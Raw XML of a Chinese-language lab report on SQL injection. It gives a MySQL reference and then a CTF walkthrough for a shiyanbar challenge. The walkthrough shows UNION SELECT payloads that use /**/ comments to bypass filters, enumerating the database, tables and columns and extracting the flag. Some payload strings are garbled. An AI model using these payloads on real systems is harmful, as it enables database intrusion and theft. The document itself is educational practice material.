                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>XOR</w:t>
            </w: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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320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 w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Calibri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eastAsia="宋体" w:cs="Calibri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逻辑异或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71" w:name="_Toc910_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>常量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblW w:w="1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current_user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null, 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true, false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72" w:name="_Toc21729_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>密码哈希</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/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在MySQL 4.1之前，由PASSWORD() 函数计算的密码哈希长度为16个字节。这样的哈希看起来像这样：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5"/>
        <w:gridCol w:w="5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PASSWORD('mypass')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5077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6f8c114b58f2ce9e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从MySQL 4.1开始，PASSWORD() 函数已被修改为产生更长的41字节哈希值：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0"/>
        <w:gridCol w:w="5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PASSWORD('mypass')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5062" w:type="dxa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*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="845" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc23316_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>密码破解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New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"https://www.websec.ca/kb/sql_injection" \l "MySQL_Password_Cracking" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://www.websec.ca/kb/sql_injection#MySQL_Password_Cracking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New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845" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc21991_WPSOffice_Level2"/>
      <w:bookmarkStart w:id="75" w:name="_Toc18368_WPSOffice_Level2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default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判断是否存在注入点，判断注入点的类型；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类型[ 数字型(int,float)、字符型(char,varchar)、查找型(%like%) ]；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14"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default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猜测SQL查询中的字段数；</w:t>
      </w:r>
    </w:p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14"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default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确定显示字段的顺序；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14"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default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获取当前数据库；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14"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default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获取当前数据库的所有表；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14"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default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获取目标表的所有列；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="200"/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14"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取数据(脱库)。</w:t>
      </w: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outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc4567_WPSOffice_Level1"/>
      <w:bookmarkStart w:id="77" w:name="_Toc31168_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验结果与分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p>
      <w:pPr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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2181860" cy="1053465"/>
            <wp:effectExtent l="0" t="0" r="889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ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc26780_WPSOffice_Level2"/>
      <w:bookmarkStart w:id="79" w:name="_Toc22056_WPSOffice_Level2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验1：简单的sql注入1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New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"http://ctf5.shiyanbar.com/423/web/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://ctf5.shiyanbar.com/423/web/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New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outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc24304_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="81" w:name="_Toc3070_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="82" w:name="_Toc11304_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="83" w:name="_Toc19907_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="84" w:name="_Toc7910_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>判断是否存在注入点，判断注入点的类型。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84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5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97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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3380740" cy="589280"/>
                  <wp:effectExtent l="0" t="0" r="10160" b="1270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740" cy="58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‘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1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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3365500" cy="469265"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
                  <wp:docPr id="1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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>注入点是字符类型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ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc15138_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="86" w:name="_Toc32406_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="87" w:name="_Toc573_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="88" w:name="_Toc23245_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="89" w:name="_Toc16735_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>猜测SQL查询中的字段数。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkEnd w:id="86"/>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="88"/>
      <w:bookmarkEnd w:id="89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5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97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  <w:t>1'/**/UNION/**/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  <w:t>SELECT/**/1/**/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  <w:t>FROM/**/DUAL/**/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  <w:t>WHERE/**/'1'='1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3382645" cy="591820"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="17780"/>
                  <wp:docPr id="2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645" cy="59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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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查询SQL字段数：1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc17657_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="91" w:name="_Toc2639_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="92" w:name="_Toc26953_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="93" w:name="_Toc3354_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="94" w:name="_Toc31893_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取当前数据库。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94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5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97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  <w:t>1'/**/UNION/**/ SELECT/**/database()/**/ FROM/**/DUAL/**/ WHERE/**/'1'='1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3382645" cy="607060"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="2540"/>
                  <wp:docPr id="2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645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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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当前数据库：web1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ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc28841_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="96" w:name="_Toc31136_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="97" w:name="_Toc12330_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="98" w:name="_Toc602_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="99" w:name="_Toc24007_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取当前数据库的目标表。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
      <w:bookmarkEnd w:id="96"/>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="99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1"/>
        <w:gridCol w:w="5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32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  <w:t>1'/**/UNION/**/ SELECT/**/table_name/**/ FROM/**/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  <w:t>information_schema.tables/**/ WHERE/**/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  <w:t>table_stable_schemachema='web1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="528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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3213735" cy="687070"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="17780"/>
                  <wp:docPr id="28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735" cy="68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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="528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目标表：flag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9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc31691_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="101" w:name="_Toc5813_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="102" w:name="_Toc10039_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="103" w:name="_Toc7387_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="104" w:name="_Toc20903_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取目标表的目标列。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkEnd w:id="102"/>
      <w:bookmarkEnd w:id="103"/>
      <w:bookmarkEnd w:id="104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1"/>
        <w:gridCol w:w="5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32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="Helvetica" w:cs="Calibri"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="393939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eastAsia="Helvetica" w:cs="Calibri"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="393939"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>1'/**/UNION/**/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="Helvetica" w:cs="Calibri"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="393939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eastAsia="Helvetica" w:cs="Calibri"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="393939"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>SELECT/**/column_nacolumn_nameme/**/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="Helvetica" w:cs="Calibri"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="393939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Courier New" w:hAnsi="Courier New" w:eastAsia="Helvetica" w:cs="Calibri"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="393939"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>FROM/**/information_schema.coluinformation_schema.columnsmns/**/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="Helvetica" w:cs="Calibri"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="393939"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>WHERE/**/table_name='flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="528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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3213735" cy="689610"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="15240"/>
                  <wp:docPr id="31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73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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="528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目标列：flag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9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc28564_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="106" w:name="_Toc20370_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="107" w:name="_Toc25553_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="108" w:name="_Toc2180_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="109" w:name="_Toc32723_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取数据(脱库)。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109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1"/>
        <w:gridCol w:w="5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32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  <w:t>1'/**/UNION/**/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  <w:t>SELECT/**/flag/**/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  <w:t>FROM/**/web1.flag/**/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  <w:t>WHERE/**/'1'='1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="528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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3213735" cy="574040"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="16510"/>
                  <wp:docPr id="3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735" cy="57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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="528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结果：flag{Y0u_@r3_5O_dAmn_90Od}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15"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc23412_WPSOffice_Level2"/>
      <w:bookmarkStart w:id="111" w:name="_Toc18676_WPSOffice_Level2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验2：简单的sql注入2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New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"http://ctf5.shiyanbar.com/web/index_2.php" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://ctf5.shiyanbar.com/web/index_2.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New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outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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1"/>
